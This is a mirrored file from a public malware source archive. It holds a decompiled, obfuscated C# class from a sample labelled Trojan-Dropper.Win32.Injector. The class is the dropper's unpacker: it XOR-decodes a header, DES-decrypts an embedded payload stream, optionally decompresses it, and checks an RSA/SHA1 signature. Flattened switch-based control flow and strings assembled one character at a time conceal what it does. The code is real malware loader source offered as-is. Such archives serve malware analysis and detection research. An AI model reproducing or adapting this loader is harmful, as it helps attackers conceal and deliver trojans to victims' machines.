mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
420 lines
10 KiB
C#
420 lines
10 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type:
|
|
// Assembly: Msil, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 592E0705-5FE3-456B-BE3B-BDC64BF0EA12
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Injector.bohb-8459fa9a1d18ad0edf27e23258c967c9e734b43e94385e7834ac8244fbf1249c.exe
|
|
|
|
using System;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Security.Cryptography;
|
|
|
|
internal sealed class \uE010
|
|
{
|
|
private const int \uE000 = 8;
|
|
private const int \uE001 = 20;
|
|
private const int \uE002 = 4;
|
|
private static byte[] \uE003 = new byte[4];
|
|
private static byte[] \uE004;
|
|
|
|
static \uE010()
|
|
{
|
|
label_2:
|
|
int num = 0;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
\uE010.\uE004 = new byte[4];
|
|
num = 4;
|
|
continue;
|
|
case 1:
|
|
\uE010.\uE003[1] = \uE010.\uE004[1] = (byte) 83;
|
|
num = 3;
|
|
continue;
|
|
case 2:
|
|
\uE010.\uE004[3] = (byte) 50;
|
|
num = 6;
|
|
continue;
|
|
case 3:
|
|
\uE010.\uE003[2] = \uE010.\uE004[2] = (byte) 65;
|
|
num = 5;
|
|
continue;
|
|
case 4:
|
|
\uE010.\uE003[0] = \uE010.\uE004[0] = (byte) 82;
|
|
num = 1;
|
|
continue;
|
|
case 5:
|
|
\uE010.\uE003[3] = (byte) 49;
|
|
num = 2;
|
|
continue;
|
|
case 6:
|
|
goto label_9;
|
|
default:
|
|
goto label_2;
|
|
}
|
|
}
|
|
label_9:;
|
|
}
|
|
|
|
public static MemoryStream \uE000(Stream _param0)
|
|
{
|
|
BinaryReader binaryReader1 = new BinaryReader(_param0);
|
|
DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider();
|
|
bool flag1 = binaryReader1.ReadBoolean();
|
|
int count1 = (int) binaryReader1.ReadUInt16();
|
|
byte[] buffer1 = new byte[count1];
|
|
binaryReader1.Read(buffer1, 0, count1);
|
|
if ((!flag1 ? 1 : 0) == 0)
|
|
{
|
|
byte[] buffer2 = new byte[8];
|
|
binaryReader1.Read(buffer2, 0, 8);
|
|
for (int index = 0; index < count1; ++index)
|
|
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
|
|
}
|
|
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
|
|
label_6:
|
|
int num = 7;
|
|
int count2;
|
|
int count3;
|
|
bool flag2;
|
|
byte[] numArray;
|
|
byte[] buffer3;
|
|
bool flag3;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
count2 = (int) binaryReader2.ReadByte();
|
|
num = 3;
|
|
continue;
|
|
case 1:
|
|
count3 = (int) binaryReader2.ReadByte();
|
|
num = 8;
|
|
continue;
|
|
case 2:
|
|
flag2 = binaryReader2.ReadBoolean();
|
|
num = 0;
|
|
continue;
|
|
case 3:
|
|
numArray = new byte[count2];
|
|
num = 4;
|
|
continue;
|
|
case 4:
|
|
if (flag2)
|
|
{
|
|
num = 10;
|
|
continue;
|
|
}
|
|
goto label_19;
|
|
case 5:
|
|
binaryReader2.Read(buffer3, 0, count3);
|
|
num = 6;
|
|
continue;
|
|
case 6:
|
|
cryptoServiceProvider1.IV = buffer3;
|
|
num = 2;
|
|
continue;
|
|
case 7:
|
|
binaryReader2.ReadString();
|
|
num = 9;
|
|
continue;
|
|
case 8:
|
|
buffer3 = new byte[count3];
|
|
num = 5;
|
|
continue;
|
|
case 9:
|
|
flag3 = binaryReader2.ReadBoolean();
|
|
num = 1;
|
|
continue;
|
|
case 10:
|
|
goto label_18;
|
|
default:
|
|
goto label_6;
|
|
}
|
|
}
|
|
label_18:
|
|
binaryReader2.Read(numArray, 0, count2);
|
|
label_19:
|
|
RSACryptoServiceProvider cryptoServiceProvider2 = (RSACryptoServiceProvider) null;
|
|
int count4 = binaryReader2.ReadInt32();
|
|
byte[] buffer4 = new byte[count4];
|
|
binaryReader2.Read(buffer4, 0, count4);
|
|
if (!flag2)
|
|
{
|
|
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
|
|
if (publicKey == null || publicKey.Length != 160)
|
|
throw new InvalidOperationException();
|
|
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray, 0, count2);
|
|
numArray[5] |= (byte) 128;
|
|
cryptoServiceProvider2 = new RSACryptoServiceProvider();
|
|
cryptoServiceProvider2.ImportParameters(\uE010.\uE003(publicKey));
|
|
}
|
|
cryptoServiceProvider1.Key = numArray;
|
|
MemoryStream memoryStream = new MemoryStream();
|
|
using (CryptoStream cryptoStream = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Read))
|
|
{
|
|
if (flag3)
|
|
\uE00E.\uE000((Stream) cryptoStream, (Stream) memoryStream);
|
|
else
|
|
\uE010.\uE002((Stream) cryptoStream, (Stream) memoryStream);
|
|
}
|
|
if (cryptoServiceProvider2 != null)
|
|
{
|
|
memoryStream.Position = 0L;
|
|
if (!\uE010.\uE005(cryptoServiceProvider2, (Stream) memoryStream, buffer4))
|
|
throw new InvalidOperationException();
|
|
}
|
|
memoryStream.Position = 0L;
|
|
return memoryStream;
|
|
}
|
|
|
|
private static byte[] \uE001(byte[] _param0, int _param1, int _param2)
|
|
{
|
|
if ((_param0 == null ? 1 : 0) == 0)
|
|
{
|
|
label_2:
|
|
int num = 0;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
if (_param0.Length < _param1 + _param2)
|
|
{
|
|
num = 1;
|
|
continue;
|
|
}
|
|
goto label_6;
|
|
case 1:
|
|
goto label_5;
|
|
default:
|
|
goto label_2;
|
|
}
|
|
}
|
|
label_6:
|
|
byte[] destinationArray = new byte[_param2];
|
|
Array.Copy((Array) _param0, _param1, (Array) destinationArray, 0, _param2);
|
|
return destinationArray;
|
|
}
|
|
label_5:
|
|
return (byte[]) null;
|
|
}
|
|
|
|
private static void \uE002(Stream _param0, Stream _param1)
|
|
{
|
|
byte[] buffer = new byte[4096];
|
|
while (true)
|
|
{
|
|
int count = _param0.Read(buffer, 0, buffer.Length);
|
|
if ((count <= 0 ? 0 : 1) != 0)
|
|
_param1.Write(buffer, 0, count);
|
|
else
|
|
break;
|
|
}
|
|
}
|
|
|
|
private static RSAParameters \uE003(byte[] _param0)
|
|
{
|
|
bool flag = _param0.Length == 160;
|
|
if ((!flag ? 1 : 0) == 0 && !\uE010.\uE004(_param0, \uE010.\uE003, 20))
|
|
return new RSAParameters();
|
|
if (!flag && !\uE010.\uE004(_param0, \uE010.\uE004, 8))
|
|
return new RSAParameters();
|
|
RSAParameters rsaParameters = new RSAParameters();
|
|
int num1 = (flag ? 20 : 8) + 8;
|
|
int num2 = 4;
|
|
rsaParameters.Exponent = \uE010.\uE001(_param0, num1, num2);
|
|
Array.Reverse((Array) rsaParameters.Exponent);
|
|
int num3 = num1 + num2;
|
|
int num4 = 128;
|
|
rsaParameters.Modulus = \uE010.\uE001(_param0, num3, num4);
|
|
Array.Reverse((Array) rsaParameters.Modulus);
|
|
if (flag)
|
|
return rsaParameters;
|
|
int num5 = num3 + num4;
|
|
label_8:
|
|
int num6 = 14;
|
|
while (true)
|
|
{
|
|
switch (num6)
|
|
{
|
|
case 0:
|
|
rsaParameters.P = \uE010.\uE001(_param0, num5, num4);
|
|
num6 = 12;
|
|
continue;
|
|
case 1:
|
|
rsaParameters.DQ = \uE010.\uE001(_param0, num5, num4);
|
|
num6 = 6;
|
|
continue;
|
|
case 2:
|
|
num5 += num4;
|
|
num6 = 15;
|
|
continue;
|
|
case 3:
|
|
rsaParameters.D = \uE010.\uE001(_param0, num5, num4);
|
|
num6 = 10;
|
|
continue;
|
|
case 4:
|
|
num5 += num4;
|
|
num6 = 7;
|
|
continue;
|
|
case 5:
|
|
rsaParameters.InverseQ = \uE010.\uE001(_param0, num5, num4);
|
|
num6 = 9;
|
|
continue;
|
|
case 6:
|
|
Array.Reverse((Array) rsaParameters.DQ);
|
|
num6 = 2;
|
|
continue;
|
|
case 7:
|
|
num4 = 64;
|
|
num6 = 1;
|
|
continue;
|
|
case 8:
|
|
num4 = 64;
|
|
num6 = 17;
|
|
continue;
|
|
case 9:
|
|
Array.Reverse((Array) rsaParameters.InverseQ);
|
|
num6 = 13;
|
|
continue;
|
|
case 10:
|
|
Array.Reverse((Array) rsaParameters.D);
|
|
num6 = 23;
|
|
continue;
|
|
case 11:
|
|
Array.Reverse((Array) rsaParameters.DP);
|
|
num6 = 4;
|
|
continue;
|
|
case 12:
|
|
Array.Reverse((Array) rsaParameters.P);
|
|
num6 = 16;
|
|
continue;
|
|
case 13:
|
|
num5 += num4;
|
|
num6 = 19;
|
|
continue;
|
|
case 14:
|
|
num4 = 64;
|
|
num6 = 0;
|
|
continue;
|
|
case 15:
|
|
num4 = 64;
|
|
num6 = 5;
|
|
continue;
|
|
case 16:
|
|
num5 += num4;
|
|
num6 = 21;
|
|
continue;
|
|
case 17:
|
|
rsaParameters.DP = \uE010.\uE001(_param0, num5, num4);
|
|
num6 = 11;
|
|
continue;
|
|
case 18:
|
|
rsaParameters.Q = \uE010.\uE001(_param0, num5, num4);
|
|
num6 = 20;
|
|
continue;
|
|
case 19:
|
|
num4 = 128;
|
|
num6 = 3;
|
|
continue;
|
|
case 20:
|
|
Array.Reverse((Array) rsaParameters.Q);
|
|
num6 = 22;
|
|
continue;
|
|
case 21:
|
|
num4 = 64;
|
|
num6 = 18;
|
|
continue;
|
|
case 22:
|
|
num5 += num4;
|
|
num6 = 8;
|
|
continue;
|
|
case 23:
|
|
goto label_32;
|
|
default:
|
|
goto label_8;
|
|
}
|
|
}
|
|
label_32:
|
|
return rsaParameters;
|
|
}
|
|
|
|
private static bool \uE004(byte[] _param0, byte[] _param1, int _param2)
|
|
{
|
|
int index = 0;
|
|
if ((index == 0 ? 1 : 0) != 0)
|
|
goto label_7;
|
|
else
|
|
goto label_2;
|
|
label_1:
|
|
int num;
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
goto label_3;
|
|
case 1:
|
|
return false;
|
|
}
|
|
label_2:
|
|
num = 0;
|
|
goto label_1;
|
|
label_3:
|
|
if ((int) _param0[index + _param2] != (int) _param1[index])
|
|
{
|
|
num = 1;
|
|
goto label_1;
|
|
}
|
|
else
|
|
++index;
|
|
label_7:
|
|
if (index >= _param1.Length)
|
|
return true;
|
|
goto label_3;
|
|
}
|
|
|
|
private static bool \uE005(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2)
|
|
{
|
|
SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider();
|
|
label_2:
|
|
int num = 0;
|
|
byte[] hash;
|
|
string name;
|
|
while (true)
|
|
{
|
|
switch (num)
|
|
{
|
|
case 0:
|
|
hash = cryptoServiceProvider.ComputeHash(_param1);
|
|
num = 3;
|
|
continue;
|
|
case 1:
|
|
name += (string) (object) 'A';
|
|
num = 4;
|
|
continue;
|
|
case 2:
|
|
name += (string) (object) 'H';
|
|
num = 1;
|
|
continue;
|
|
case 3:
|
|
name = new string('S', 1);
|
|
num = 2;
|
|
continue;
|
|
case 4:
|
|
name += (string) (object) '1';
|
|
num = 5;
|
|
continue;
|
|
case 5:
|
|
goto label_8;
|
|
default:
|
|
goto label_2;
|
|
}
|
|
}
|
|
label_8:
|
|
return _param0.VerifyHash(hash, CryptoConfig.MapNameToOID(name), _param2);
|
|
}
|
|
}
|